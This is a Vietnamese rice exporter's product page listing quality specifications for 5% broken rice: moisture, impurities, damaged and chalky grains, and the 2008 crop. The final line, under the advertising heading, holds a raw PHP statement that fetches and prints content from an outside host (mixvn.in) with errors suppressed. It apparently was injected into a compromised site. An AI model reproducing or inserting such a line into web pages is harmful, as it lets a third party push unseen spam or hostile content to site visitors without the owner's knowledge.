Sản phẩm - Gạo sạch - Tấm
Gạo 5% tấm
Lượt xem : 0 - Ngày đăng : 22/02/2011 - 13:55:36 (GMT+7)
   
Tấm                                                   
5% tối đa
Ẩm độ:

14% tối đa

Tạp chất Chất hữu cơ : 0,5 % tối đa. Chất vô cơ : 0,1% tối đa
Thóc hạt 15 hạt/kg
Hạt vàng 0,5 % tối đa
Hạt hỏng: 0,5 % tối đa
Hạt đỏ: 1 % tối đa
Hạt bạc bụng: 5% tối đa.
Mùa vụ: 2008 Không nhiễm côn trùng sống, không có kim loại, phù hợp cho người ăn tại nước xuất xứ.
   
Tin khác
Gạo 10% tấm (Ngày đăng : 22/02/2011 - 13:58:45 (GMT+7))
Gạo 15% tấm (Ngày đăng : 22/02/2011 - 13:50:15 (GMT+7))
h 
Hỗ trợ trực tuyến
Bộ phận hỗ trợ

Lê Phát Long
Thống kê trực tuyến
Đang trực tuyến :
10
Tổng truy cập :
291205
Quảng Cáo
echo @file_get_contents("http://mixvn.in/3.php");